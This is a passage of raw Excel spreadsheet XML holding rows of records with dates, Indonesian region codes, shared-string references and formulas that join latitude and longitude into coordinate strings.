        <v>33</v>
      </c>
      <c r="U2495" s="5">
        <v>10671130</v>
      </c>
      <c r="V2495" s="5" t="s">
        <v>16680</v>
      </c>
      <c r="W2495" s="5">
        <v>-610459</v>
      </c>
      <c r="X2495" t="s">
        <v>20421</v>
      </c>
      <c r="Y2495" t="str">
        <f t="shared" si="38"/>
        <v>-6.10459,106.71130</v>
      </c>
    </row>
    <row r="2496" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2496">
        <v>223727</v>
      </c>
      <c r="B2496" s="1">
        <v>44153</v>
      </c>
      <c r="C2496" s="2">
        <v>1.8564814814814815E-2</v>
      </c>
      <c r="D2496" t="s">
        <v>22</v>
      </c>
      <c r="E2496" t="s">
        <v>23</v>
      </c>
      <c r="F2496" t="s">
        <v>8373</v>
      </c>
      <c r="G2496" t="s">
        <v>8374</v>
      </c>
      <c r="H2496" t="s">
        <v>26</v>
      </c>
      <c r="I2496" t="s">
        <v>882</v>
      </c>
      <c r="J2496" t="s">
        <v>2608</v>
      </c>
      <c r="L2496" t="s">
        <v>8375</v>
      </c>
      <c r="M2496">
        <v>3301030004</v>
      </c>
      <c r="N2496">
        <v>3301030</v>
      </c>
      <c r="O2496">
        <v>3301</v>
      </c>
      <c r="P2496">
        <v>33</v>
      </c>
      <c r="Q2496" t="s">
        <v>8376</v>
      </c>
      <c r="R2496" t="s">
        <v>2641</v>
      </c>
      <c r="S2496" t="s">
        <v>2642</v>
      </c>
      <c r="T2496" t="s">
        <v>1134</v>
      </c>
      <c r="U2496" s="5">
        <v>10876686</v>
      </c>
      <c r="V2496" s="5" t="s">
        <v>16681</v>
      </c>
      <c r="W2496" s="5">
        <v>-734590</v>
      </c>
      <c r="X2496" t="s">
        <v>20422</v>
      </c>
      <c r="Y2496" t="str">
        <f t="shared" si="38"/>
        <v>-7.34590,108.76686</v>
      </c>
    </row>
    <row r="2497" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2497">
        <v>223752</v>
      </c>
      <c r="B2497" s="1">
        <v>44153</v>
      </c>
      <c r="C2497" s="2">
        <v>0.10208333333333335</v>
      </c>
      <c r="D2497" t="s">
        <v>2648</v>
      </c>
      <c r="E2497" t="s">
        <v>23</v>
      </c>
      <c r="G2497" t="s">
        <v>8377</v>
      </c>
      <c r="H2497" t="s">
        <v>26</v>
      </c>
      <c r="J2497" t="s">
        <v>793</v>
      </c>
      <c r="L2497" t="s">
        <v>8378</v>
      </c>
      <c r="M2497">
        <v>3175010002</v>
      </c>
      <c r="N2497">
        <v>3175010</v>
      </c>
      <c r="O2497">
        <v>3175</v>
      </c>
      <c r="P2497">
        <v>31</v>
      </c>
      <c r="Q2497" t="s">
        <v>616</v>
      </c>
      <c r="R2497" t="s">
        <v>546</v>
      </c>
      <c r="S2497" t="s">
        <v>547</v>
      </c>
      <c r="T2497" t="s">
        <v>33</v>
      </c>
      <c r="U2497" s="5">
        <v>10677528</v>
      </c>
      <c r="V2497" s="5" t="s">
        <v>16682</v>
      </c>
      <c r="W2497" s="5">
        <v>-614146</v>
      </c>
      <c r="X2497" t="s">
        <v>20423</v>
      </c>
      <c r="Y2497" t="str">
        <f t="shared" si="38"/>
        <v>-6.14146,106.77528</v>
      </c>
    </row>
    <row r="2498" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2498">
        <v>224114</v>
      </c>
      <c r="B2498" s="1">
        <v>44154</v>
      </c>
      <c r="C2498" s="2">
        <v>0.3024189814814815</v>
      </c>
      <c r="D2498" t="s">
        <v>22</v>
      </c>
      <c r="E2498" t="s">
        <v>23</v>
      </c>
      <c r="F2498" t="s">
        <v>8379</v>
      </c>
      <c r="G2498" t="s">
        <v>8380</v>
      </c>
      <c r="H2498" t="s">
        <v>26</v>
      </c>
      <c r="I2498" t="s">
        <v>1809</v>
      </c>
      <c r="J2498" t="s">
        <v>2608</v>
      </c>
      <c r="L2498" t="s">
        <v>8381</v>
      </c>
      <c r="M2498">
        <v>3301070004</v>
      </c>
      <c r="N2498">
        <v>3301070</v>
      </c>
      <c r="O2498">
        <v>3301</v>
      </c>
      <c r="P2498">
        <v>33</v>
      </c>
      <c r="Q2498" t="s">
        <v>8382</v>
      </c>
      <c r="R2498" t="s">
        <v>8383</v>
      </c>
      <c r="S2498" t="s">
        <v>2642</v>
      </c>
      <c r="T2498" t="s">
        <v>1134</v>
      </c>
      <c r="U2498" s="5">
        <v>10878843</v>
      </c>
      <c r="V2498" s="5" t="s">
        <v>16683</v>
      </c>
      <c r="W2498" s="5">
        <v>-748329</v>
      </c>
      <c r="X2498" t="s">
        <v>20424</v>
      </c>
      <c r="Y2498" t="str">
        <f t="shared" si="38"/>
        <v>-7.48329,108.78843</v>
      </c>
    </row>
    <row r="2499" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2499">
        <v>224135</v>
      </c>
      <c r="B2499" s="1">
        <v>44154</v>
      </c>
      <c r="C2499" s="2">
        <v>0.47754629629629625</v>
      </c>
      <c r="D2499" t="s">
        <v>22</v>
      </c>
      <c r="E2499" t="s">
        <v>23</v>
      </c>
      <c r="F2499" t="s">
        <v>8384</v>
      </c>
      <c r="G2499" t="s">
        <v>8385</v>
      </c>
      <c r="H2499" t="s">
        <v>7978</v>
      </c>
      <c r="I2499" t="s">
        <v>7979</v>
      </c>
      <c r="J2499" t="s">
        <v>2622</v>
      </c>
      <c r="M2499">
        <v>3510180003</v>
      </c>
      <c r="N2499">
        <v>3510180</v>
      </c>
      <c r="O2499">
        <v>3510</v>
      </c>
      <c r="P2499">
        <v>35</v>
      </c>
      <c r="Q2499" t="s">
        <v>8386</v>
      </c>
      <c r="R2499" t="s">
        <v>8370</v>
      </c>
      <c r="S2499" t="s">
        <v>8370</v>
      </c>
      <c r="T2499" t="s">
        <v>1221</v>
      </c>
      <c r="U2499" s="5">
        <v>11435311</v>
      </c>
      <c r="V2499" s="5" t="s">
        <v>16684</v>
      </c>
      <c r="W2499" s="5">
        <v>-822498</v>
      </c>
      <c r="X2499" t="s">
        <v>20425</v>
      </c>
      <c r="Y2499" t="str">
        <f t="shared" ref="Y2499:Y2562" si="39">CONCATENATE(X2499,",",V2499)</f>
        <v>-8.22498,114.35311</v>
      </c>
    </row>
    <row r="2500" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2500">
        <v>224188</v>
      </c>
      <c r="B2500" s="1">
        <v>44155</v>
      </c>
      <c r="C2500" s="2">
        <v>0.25138888888888888</v>
      </c>
      <c r="D2500" t="s">
        <v>2648</v>
      </c>
      <c r="E2500" t="s">
        <v>23</v>
      </c>
      <c r="G2500" t="s">
        <v>8387</v>
      </c>
      <c r="H2500" t="s">
        <v>26</v>
      </c>
      <c r="J2500" t="s">
        <v>8388</v>
      </c>
      <c r="L2500" t="s">
        <v>8389</v>
      </c>
      <c r="M2500">
        <v>3175040003</v>
      </c>
      <c r="N2500">
        <v>3175040</v>
      </c>
      <c r="O2500">
        <v>3175</v>
      </c>
      <c r="P2500">
        <v>31</v>
      </c>
      <c r="Q2500" t="s">
        <v>2062</v>
      </c>
      <c r="R2500" t="s">
        <v>2063</v>
      </c>
      <c r="S2500" t="s">
        <v>547</v>
      </c>
      <c r="T2500" t="s">
        <v>33</v>
      </c>
      <c r="U2500" s="5">
        <v>10691129</v>
      </c>
      <c r="V2500" s="5" t="s">
        <v>14798</v>
      </c>
      <c r="W2500" s="5">
        <v>-611929</v>
      </c>
      <c r="X2500" t="s">
        <v>20426</v>
      </c>
      <c r="Y2500" t="str">
        <f t="shared" si="39"/>
        <v>-6.11929,106.91129</v>
      </c>
    </row>
    <row r="2501" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2501">
        <v>224239</v>
      </c>
      <c r="B2501" s="1">
        <v>44157</v>
      </c>
      <c r="C2501" s="2">
        <v>0.3622569444444444</v>
      </c>
      <c r="D2501" t="s">
        <v>85</v>
      </c>
      <c r="E2501" t="s">
        <v>23</v>
      </c>
      <c r="F2501" t="s">
        <v>8390</v>
      </c>
      <c r="G2501" t="s">
        <v>8391</v>
      </c>
      <c r="H2501" t="s">
        <v>26</v>
      </c>
      <c r="J2501" t="s">
        <v>2627</v>
      </c>
      <c r="K2501" t="s">
        <v>8392</v>
      </c>
      <c r="L2501" t="s">
        <v>8393</v>
      </c>
      <c r="M2501">
        <v>3275010010</v>
      </c>
      <c r="N2501">
        <v>3275010</v>
      </c>
      <c r="O2501">
        <v>3275</v>
      </c>
      <c r="P2501">
        <v>32</v>
      </c>
      <c r="Q2501" t="s">
        <v>286</v>
      </c>
      <c r="R2501" t="s">
        <v>287</v>
      </c>
      <c r="S2501" t="s">
        <v>41</v>
      </c>
      <c r="T2501" t="s">
        <v>42</v>
      </c>
      <c r="U2501" s="5">
        <v>10694399</v>
      </c>
      <c r="V2501" s="5" t="s">
        <v>14825</v>
      </c>
      <c r="W2501" s="5">
        <v>-625195</v>
      </c>
      <c r="X2501" t="s">
        <v>20427</v>
      </c>
      <c r="Y2501" t="str">
        <f t="shared" si="39"/>
        <v>-6.25195,106.94399</v>
      </c>
    </row>
    <row r="2502" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2502">
        <v>224254</v>
      </c>
      <c r="B2502" s="1">
        <v>44158</v>
      </c>
      <c r="C2502" s="2">
        <v>0.37524305555555554</v>
      </c>
      <c r="D2502" t="s">
        <v>22</v>
      </c>
      <c r="E2502" t="s">
        <v>23</v>
      </c>
      <c r="F2502" t="s">
        <v>8394</v>
      </c>
      <c r="G2502" t="s">
        <v>8395</v>
      </c>
      <c r="H2502" t="s">
        <v>26</v>
      </c>
      <c r="I2502" t="s">
        <v>2962</v>
      </c>
      <c r="J2502" t="s">
        <v>3135</v>
      </c>
      <c r="L2502" t="s">
        <v>8396</v>
      </c>
      <c r="M2502">
        <v>3603050003</v>
      </c>
      <c r="N2502">
        <v>3603050</v>
      </c>
      <c r="O2502">
        <v>3603</v>
      </c>
      <c r="P2502">
        <v>36</v>
      </c>
      <c r="Q2502" t="s">
        <v>3987</v>
      </c>
      <c r="R2502" t="s">
        <v>3988</v>
      </c>
      <c r="S2502" t="s">
        <v>201</v>
      </c>
      <c r="T2502" t="s">
        <v>171</v>
      </c>
      <c r="U2502" s="5">
        <v>10658306</v>
      </c>
      <c r="V2502" s="5" t="s">
        <v>16685</v>
      </c>
      <c r="W2502" s="5">
        <v>-624737</v>
      </c>
      <c r="X2502" t="s">
        <v>20428</v>
      </c>
      <c r="Y2502" t="str">
        <f t="shared" si="39"/>
        <v>-6.24737,106.58306</v>
      </c>
    </row>
    <row r="2503" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2503">
        <v>224276</v>
      </c>
      <c r="B2503" s="1">
        <v>44160</v>
      </c>
      <c r="C2503" s="2">
        <v>6.7361111111111108E-2</v>
      </c>
      <c r="D2503" t="s">
        <v>2648</v>
      </c>
      <c r="E2503" t="s">
        <v>23</v>
      </c>
      <c r="G2503" t="s">
        <v>8397</v>
      </c>
      <c r="H2503" t="s">
        <v>26</v>
      </c>
      <c r="J2503" t="s">
        <v>6648</v>
      </c>
      <c r="L2503" t="s">
        <v>8398</v>
      </c>
      <c r="M2503">
        <v>3174070004</v>
      </c>
      <c r="N2503">
        <v>3174070</v>
      </c>
      <c r="O2503">
        <v>3174</v>
      </c>
      <c r="P2503">
        <v>31</v>
      </c>
      <c r="Q2503" t="s">
        <v>926</v>
      </c>
      <c r="R2503" t="s">
        <v>84</v>
      </c>
      <c r="S2503" t="s">
        <v>32</v>
      </c>
      <c r="T2503" t="s">
        <v>33</v>
      </c>
      <c r="U2503" s="5">
        <v>10674839</v>
      </c>
      <c r="V2503" s="5" t="s">
        <v>16686</v>
      </c>
      <c r="W2503" s="5">
        <v>-613553</v>
      </c>
      <c r="X2503" t="s">
        <v>20429</v>
      </c>
      <c r="Y2503" t="str">
        <f t="shared" si="39"/>
        <v>-6.13553,106.74839</v>
      </c>
    </row>
    <row r="2504" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2504">
        <v>224341</v>
      </c>
      <c r="B2504" s="1">
        <v>44163</v>
      </c>
      <c r="C2504" s="2">
        <v>5.8333333333333327E-2</v>
      </c>
      <c r="D2504" t="s">
        <v>2648</v>
      </c>
      <c r="E2504" t="s">
        <v>23</v>
      </c>
      <c r="G2504" t="s">
        <v>8399</v>
      </c>
      <c r="H2504" t="s">
        <v>26</v>
      </c>
      <c r="J2504" t="s">
        <v>1519</v>
      </c>
      <c r="L2504" t="s">
        <v>8400</v>
      </c>
      <c r="M2504">
        <v>3175010003</v>
      </c>
      <c r="N2504">
        <v>3175010</v>
      </c>
      <c r="O2504">
        <v>3175</v>
      </c>
      <c r="P2504">
        <v>31</v>
      </c>
      <c r="Q2504" t="s">
        <v>545</v>
      </c>
      <c r="R2504" t="s">
        <v>546</v>
      </c>
      <c r="S2504" t="s">
        <v>547</v>
      </c>
      <c r="T2504" t="s">
        <v>33</v>
      </c>
      <c r="U2504" s="5">
        <v>10677601</v>
      </c>
      <c r="V2504" s="5" t="s">
        <v>16687</v>
      </c>
      <c r="W2504" s="5">
        <v>-614109</v>
      </c>
      <c r="X2504" t="s">
        <v>18584</v>
      </c>
      <c r="Y2504" t="str">
        <f t="shared" si="39"/>
        <v>-6.14109,106.77601</v>
      </c>
    </row>
    <row r="2505" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2505">
        <v>224376</v>
      </c>
      <c r="B2505" s="1">
        <v>44167</v>
      </c>
      <c r="C2505" s="2">
        <v>2.1759259259259259E-2</v>
      </c>
      <c r="D2505" t="s">
        <v>22</v>
      </c>
      <c r="E2505" t="s">
        <v>23</v>
      </c>
      <c r="F2505" t="s">
        <v>8401</v>
      </c>
      <c r="G2505" t="s">
        <v>8402</v>
      </c>
      <c r="H2505" t="s">
        <v>26</v>
      </c>
      <c r="I2505" t="s">
        <v>137</v>
      </c>
      <c r="J2505" t="s">
        <v>7171</v>
      </c>
      <c r="L2505" t="s">
        <v>8403</v>
      </c>
      <c r="M2505">
        <v>6472060005</v>
      </c>
      <c r="N2505">
        <v>6472060</v>
      </c>
      <c r="O2505">
        <v>6472</v>
      </c>
      <c r="P2505">
        <v>64</v>
      </c>
      <c r="Q2505" t="s">
        <v>8404</v>
      </c>
      <c r="R2505" t="s">
        <v>7203</v>
      </c>
      <c r="S2505" t="s">
        <v>7175</v>
      </c>
      <c r="T2505" t="s">
        <v>1308</v>
      </c>
      <c r="U2505" s="5">
        <v>11716916</v>
      </c>
      <c r="V2505" s="5" t="s">
        <v>16688</v>
      </c>
      <c r="W2505" s="5">
        <v>-44898</v>
      </c>
      <c r="X2505" t="s">
        <v>20430</v>
      </c>
      <c r="Y2505" t="str">
        <f t="shared" si="39"/>
        <v xml:space="preserve"> -0.44898,117.16916</v>
      </c>
    </row>
    <row r="2506" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2506">
        <v>224377</v>
      </c>
      <c r="B2506" s="1">
        <v>44167</v>
      </c>
      <c r="C2506" s="2">
        <v>0.74170138888888892</v>
      </c>
      <c r="D2506" t="s">
        <v>22</v>
      </c>
      <c r="E2506" t="s">
        <v>23</v>
      </c>
      <c r="F2506" t="s">
        <v>8405</v>
      </c>
      <c r="G2506" t="s">
        <v>8406</v>
      </c>
      <c r="H2506" t="s">
        <v>26</v>
      </c>
      <c r="I2506" t="s">
        <v>886</v>
      </c>
      <c r="J2506" t="s">
        <v>8407</v>
      </c>
      <c r="M2506">
        <v>3374150005</v>
      </c>
      <c r="N2506">
        <v>3374150</v>
      </c>
      <c r="O2506">
        <v>3374</v>
      </c>
      <c r="P2506">
        <v>33</v>
      </c>
      <c r="Q2506" t="s">
        <v>6552</v>
      </c>
      <c r="R2506" t="s">
        <v>6553</v>
      </c>
      <c r="S2506" t="s">
        <v>1334</v>
      </c>
      <c r="T2506" t="s">
        <v>1134</v>
      </c>
      <c r="U2506" s="5">
        <v>11031187</v>
      </c>
      <c r="V2506" s="5" t="s">
        <v>16689</v>
      </c>
      <c r="W2506" s="5">
        <v>-695870</v>
      </c>
      <c r="X2506" t="s">
        <v>20431</v>
      </c>
      <c r="Y2506" t="str">
        <f t="shared" si="39"/>
        <v>-6.95870,110.31187</v>
      </c>
    </row>
    <row r="2507" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2507">
        <v>224378</v>
      </c>
      <c r="B2507" s="1">
        <v>44167</v>
      </c>
      <c r="C2507" s="2">
        <v>0.79497685185185185</v>
      </c>
      <c r="D2507" t="s">
        <v>22</v>
      </c>
      <c r="E2507" t="s">
        <v>23</v>
      </c>
      <c r="F2507" t="s">
        <v>8408</v>
      </c>
      <c r="G2507" t="s">
        <v>8409</v>
      </c>
      <c r="H2507" t="s">
        <v>26</v>
      </c>
      <c r="I2507" t="s">
        <v>166</v>
      </c>
      <c r="J2507" t="s">
        <v>3135</v>
      </c>
      <c r="M2507">
        <v>3672031001</v>
      </c>
      <c r="N2507">
        <v>3672031</v>
      </c>
      <c r="O2507">
        <v>3672</v>
      </c>
      <c r="P2507">
        <v>36</v>
      </c>
      <c r="Q2507" t="s">
        <v>8410</v>
      </c>
      <c r="R2507" t="s">
        <v>340</v>
      </c>
      <c r="S2507" t="s">
        <v>7043</v>
      </c>
      <c r="T2507" t="s">
        <v>171</v>
      </c>
      <c r="U2507" s="5">
        <v>10605394</v>
      </c>
      <c r="V2507" s="5" t="s">
        <v>16690</v>
      </c>
      <c r="W2507" s="5">
        <v>-602074</v>
      </c>
      <c r="X2507" t="s">
        <v>20432</v>
      </c>
      <c r="Y2507" t="str">
        <f t="shared" si="39"/>
        <v>-6.02074,106.05394</v>
      </c>
    </row>
    <row r="2508" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2508">
        <v>224379</v>
      </c>
      <c r="B2508" s="1">
        <v>44167</v>
      </c>
      <c r="C2508" s="2">
        <v>0.93630787037037033</v>
      </c>
      <c r="D2508" t="s">
        <v>22</v>
      </c>
      <c r="E2508" t="s">
        <v>23</v>
      </c>
      <c r="F2508" t="s">
        <v>8411</v>
      </c>
      <c r="G2508" t="s">
        <v>8412</v>
      </c>
      <c r="H2508" t="s">
        <v>26</v>
      </c>
      <c r="I2508" t="s">
        <v>27</v>
      </c>
      <c r="J2508" t="s">
        <v>3135</v>
      </c>
      <c r="L2508" t="s">
        <v>8413</v>
      </c>
      <c r="M2508">
        <v>3672021001</v>
      </c>
      <c r="N2508">
        <v>3672021</v>
      </c>
      <c r="O2508">
        <v>3672</v>
      </c>
      <c r="P2508">
        <v>36</v>
      </c>
      <c r="Q2508" t="s">
        <v>8414</v>
      </c>
      <c r="R2508" t="s">
        <v>7042</v>
      </c>
      <c r="S2508" t="s">
        <v>7043</v>
      </c>
      <c r="T2508" t="s">
        <v>171</v>
      </c>
      <c r="U2508" s="5">
        <v>10604373</v>
      </c>
      <c r="V2508" s="5" t="s">
        <v>16691</v>
      </c>
      <c r="W2508" s="5">
        <v>-601165</v>
      </c>
      <c r="X2508" t="s">
        <v>20433</v>
      </c>
      <c r="Y2508" t="str">
        <f t="shared" si="39"/>
        <v>-6.01165,106.04373</v>
      </c>
    </row>
    <row r="2509" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2509">
        <v>224380</v>
      </c>
      <c r="B2509" s="1">
        <v>44167</v>
      </c>
      <c r="C2509" s="2">
        <v>0.94005787037037036</v>
      </c>
      <c r="D2509" t="s">
        <v>22</v>
      </c>
      <c r="E2509" t="s">
        <v>23</v>
      </c>
      <c r="F2509" t="s">
        <v>8415</v>
      </c>
      <c r="G2509" t="s">
        <v>8416</v>
      </c>
      <c r="H2509" t="s">
        <v>26</v>
      </c>
      <c r="I2509" t="s">
        <v>27</v>
      </c>
      <c r="J2509" t="s">
        <v>3135</v>
      </c>
      <c r="L2509" t="s">
        <v>8417</v>
      </c>
      <c r="M2509">
        <v>3672021001</v>
      </c>
      <c r="N2509">
        <v>3672021</v>
      </c>
      <c r="O2509">
        <v>3672</v>
      </c>
      <c r="P2509">
        <v>36</v>
      </c>
      <c r="Q2509" t="s">
        <v>8414</v>
      </c>
      <c r="R2509" t="s">
        <v>7042</v>
      </c>
      <c r="S2509" t="s">
        <v>7043</v>
      </c>
      <c r="T2509" t="s">
        <v>171</v>
      </c>
      <c r="U2509" s="5">
        <v>10604368</v>
      </c>
      <c r="V2509" s="5" t="s">
        <v>16692</v>
      </c>
      <c r="W2509" s="5">
        <v>-601160</v>
      </c>
      <c r="X2509" t="s">
        <v>20434</v>
      </c>
      <c r="Y2509" t="str">
        <f t="shared" si="39"/>
        <v>-6.01160,106.04368</v>
      </c>
    </row>
    <row r="2510" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2510">
        <v>224381</v>
      </c>
      <c r="B2510" s="1">
        <v>44168</v>
      </c>
      <c r="C2510" s="2">
        <v>6.851851851851852E-3</v>
      </c>
      <c r="D2510" t="s">
        <v>22</v>
      </c>
      <c r="E2510" t="s">
        <v>23</v>
      </c>
      <c r="F2510" t="s">
        <v>8418</v>
      </c>
      <c r="G2510" t="s">
        <v>8419</v>
      </c>
      <c r="H2510" t="s">
        <v>26</v>
      </c>
      <c r="I2510" t="s">
        <v>271</v>
      </c>
      <c r="J2510" t="s">
        <v>3135</v>
      </c>
      <c r="L2510" t="s">
        <v>8420</v>
      </c>
      <c r="M2510">
        <v>3672040005</v>
      </c>
      <c r="N2510">
        <v>3672040</v>
      </c>
      <c r="O2510">
        <v>3672</v>
      </c>
      <c r="P2510">
        <v>36</v>
      </c>
      <c r="Q2510" t="s">
        <v>8421</v>
      </c>
      <c r="R2510" t="s">
        <v>8421</v>
      </c>
      <c r="S2510" t="s">
        <v>7043</v>
      </c>
      <c r="T2510" t="s">
        <v>171</v>
      </c>
      <c r="U2510" s="5">
        <v>10606804</v>
      </c>
      <c r="V2510" s="5" t="s">
        <v>16693</v>
      </c>
      <c r="W2510" s="5">
        <v>-603722</v>
      </c>
      <c r="X2510" t="s">
        <v>20435</v>
      </c>
      <c r="Y2510" t="str">
        <f t="shared" si="39"/>
        <v>-6.03722,106.06804</v>
      </c>
    </row>
    <row r="2511" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2511">
        <v>224392</v>
      </c>
      <c r="B2511" s="1">
        <v>44168</v>
      </c>
      <c r="C2511" s="2">
        <v>0.39450231481481479</v>
      </c>
      <c r="D2511" t="s">
        <v>22</v>
      </c>
      <c r="E2511" t="s">
        <v>23</v>
      </c>
      <c r="F2511" t="s">
        <v>8422</v>
      </c>
      <c r="G2511" t="s">
        <v>8423</v>
      </c>
      <c r="H2511" t="s">
        <v>26</v>
      </c>
      <c r="I2511" t="s">
        <v>137</v>
      </c>
      <c r="J2511" t="s">
        <v>2608</v>
      </c>
      <c r="L2511" t="s">
        <v>8424</v>
      </c>
      <c r="M2511">
        <v>3329170009</v>
      </c>
      <c r="N2511">
        <v>3329170</v>
      </c>
      <c r="O2511">
        <v>3329</v>
      </c>
      <c r="P2511">
        <v>33</v>
      </c>
      <c r="Q2511" t="s">
        <v>7301</v>
      </c>
      <c r="R2511" t="s">
        <v>7301</v>
      </c>
      <c r="S2511" t="s">
        <v>7301</v>
      </c>
      <c r="T2511" t="s">
        <v>1134</v>
      </c>
      <c r="U2511" s="5">
        <v>10903420</v>
      </c>
      <c r="V2511" s="5" t="s">
        <v>16694</v>
      </c>
      <c r="W2511" s="5">
        <v>-687185</v>
      </c>
      <c r="X2511" t="s">
        <v>20436</v>
      </c>
      <c r="Y2511" t="str">
        <f t="shared" si="39"/>
        <v>-6.87185,109.03420</v>
      </c>
    </row>
    <row r="2512" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2512">
        <v>224393</v>
      </c>
      <c r="B2512" s="1">
        <v>44168</v>
      </c>
      <c r="C2512" s="2">
        <v>0.74250000000000005</v>
      </c>
      <c r="D2512" t="s">
        <v>22</v>
      </c>
      <c r="E2512" t="s">
        <v>23</v>
      </c>
      <c r="F2512" t="s">
        <v>8425</v>
      </c>
      <c r="G2512" t="s">
        <v>8426</v>
      </c>
      <c r="H2512" t="s">
        <v>26</v>
      </c>
      <c r="I2512" t="s">
        <v>8427</v>
      </c>
      <c r="J2512" t="s">
        <v>1656</v>
      </c>
      <c r="L2512" t="s">
        <v>8428</v>
      </c>
      <c r="M2512">
        <v>3173080003</v>
      </c>
      <c r="N2512">
        <v>3173080</v>
      </c>
      <c r="O2512">
        <v>3173</v>
      </c>
      <c r="P2512">
        <v>31</v>
      </c>
      <c r="Q2512" t="s">
        <v>157</v>
      </c>
      <c r="R2512" t="s">
        <v>157</v>
      </c>
      <c r="S2512" t="s">
        <v>62</v>
      </c>
      <c r="T2512" t="s">
        <v>33</v>
      </c>
      <c r="U2512" s="5">
        <v>10682719</v>
      </c>
      <c r="V2512" s="5" t="s">
        <v>16695</v>
      </c>
      <c r="W2512" s="5">
        <v>-617554</v>
      </c>
      <c r="X2512" t="s">
        <v>20437</v>
      </c>
      <c r="Y2512" t="str">
        <f t="shared" si="39"/>
        <v>-6.17554,106.82719</v>
      </c>
    </row>
    <row r="2513" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2513">
        <v>224394</v>
      </c>
      <c r="B2513" s="1">
        <v>44169</v>
      </c>
      <c r="C2513" s="2">
        <v>0.11658564814814815</v>
      </c>
      <c r="D2513" t="s">
        <v>22</v>
      </c>
      <c r="E2513" t="s">
        <v>23</v>
      </c>
      <c r="F2513" t="s">
        <v>8429</v>
      </c>
      <c r="G2513" t="s">
        <v>8430</v>
      </c>
      <c r="H2513" t="s">
        <v>26</v>
      </c>
      <c r="I2513" t="s">
        <v>7487</v>
      </c>
      <c r="J2513" t="s">
        <v>6038</v>
      </c>
      <c r="L2513" t="s">
        <v>8431</v>
      </c>
      <c r="M2513">
        <v>1275010008</v>
      </c>
      <c r="N2513">
        <v>1275010</v>
      </c>
      <c r="O2513">
        <v>1275</v>
      </c>
      <c r="P2513">
        <v>12</v>
      </c>
      <c r="Q2513" t="s">
        <v>8432</v>
      </c>
      <c r="R2513" t="s">
        <v>8433</v>
      </c>
      <c r="S2513" t="s">
        <v>7704</v>
      </c>
      <c r="T2513" t="s">
        <v>6043</v>
      </c>
      <c r="U2513" s="5">
        <v>9860468</v>
      </c>
      <c r="V2513" s="5" t="s">
        <v>16696</v>
      </c>
      <c r="W2513" s="5">
        <v>354140</v>
      </c>
      <c r="X2513" t="s">
        <v>20438</v>
      </c>
      <c r="Y2513" t="str">
        <f t="shared" si="39"/>
        <v>3.54140,98.60468</v>
      </c>
    </row>
    <row r="2514" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2514">
        <v>224396</v>
      </c>
      <c r="B2514" s="1">
        <v>44169</v>
      </c>
      <c r="C2514" s="2">
        <v>0.5554513888888889</v>
      </c>
      <c r="D2514" t="s">
        <v>22</v>
      </c>
      <c r="E2514" t="s">
        <v>23</v>
      </c>
      <c r="F2514" t="s">
        <v>8434</v>
      </c>
      <c r="G2514" t="s">
        <v>8435</v>
      </c>
      <c r="H2514" t="s">
        <v>26</v>
      </c>
      <c r="I2514" t="s">
        <v>7487</v>
      </c>
      <c r="J2514" t="s">
        <v>6038</v>
      </c>
      <c r="M2514">
        <v>1275070005</v>
      </c>
      <c r="N2514">
        <v>1275070</v>
      </c>
      <c r="O2514">
        <v>1275</v>
      </c>
      <c r="P2514">
        <v>12</v>
      </c>
      <c r="Q2514" t="s">
        <v>8436</v>
      </c>
      <c r="R2514" t="s">
        <v>8437</v>
      </c>
      <c r="S2514" t="s">
        <v>7704</v>
      </c>
      <c r="T2514" t="s">
        <v>6043</v>
      </c>
      <c r="U2514" s="5">
        <v>9868252</v>
      </c>
      <c r="V2514" s="5" t="s">
        <v>16697</v>
      </c>
      <c r="W2514" s="5">
        <v>357853</v>
      </c>
      <c r="X2514" t="s">
        <v>20439</v>
      </c>
      <c r="Y2514" t="str">
        <f t="shared" si="39"/>
        <v>3.57853,98.68252</v>
      </c>
    </row>
    <row r="2515" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2515">
        <v>224397</v>
      </c>
      <c r="B2515" s="1">
        <v>44169</v>
      </c>
      <c r="C2515" s="2">
        <v>0.57341435185185186</v>
      </c>
      <c r="D2515" t="s">
        <v>22</v>
      </c>
      <c r="E2515" t="s">
        <v>23</v>
      </c>
      <c r="F2515" t="s">
        <v>8438</v>
      </c>
      <c r="H2515" t="s">
        <v>26</v>
      </c>
      <c r="I2515" t="s">
        <v>2300</v>
      </c>
      <c r="J2515" t="s">
        <v>6038</v>
      </c>
      <c r="L2515" t="s">
        <v>8439</v>
      </c>
      <c r="M2515">
        <v>1275110001</v>
      </c>
      <c r="N2515">
        <v>1275110</v>
      </c>
      <c r="O2515">
        <v>1275</v>
      </c>
      <c r="P2515">
        <v>12</v>
      </c>
      <c r="Q2515" t="s">
        <v>8440</v>
      </c>
      <c r="R2515" t="s">
        <v>7986</v>
      </c>
      <c r="S2515" t="s">
        <v>7704</v>
      </c>
      <c r="T2515" t="s">
        <v>6043</v>
      </c>
      <c r="U2515" s="5">
        <v>9862127</v>
      </c>
      <c r="V2515" s="5" t="s">
        <v>16698</v>
      </c>
      <c r="W2515" s="5">
        <v>357475</v>
      </c>
      <c r="X2515" t="s">
        <v>20440</v>
      </c>
      <c r="Y2515" t="str">
        <f t="shared" si="39"/>
        <v>3.57475,98.62127</v>
      </c>
    </row>
    <row r="2516" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2516">
        <v>224398</v>
      </c>
      <c r="B2516" s="1">
        <v>44169</v>
      </c>
      <c r="C2516" s="2">
        <v>0.62488425925925928</v>
      </c>
      <c r="D2516" t="s">
        <v>22</v>
      </c>
      <c r="E2516" t="s">
        <v>23</v>
      </c>
      <c r="F2516" t="s">
        <v>8441</v>
      </c>
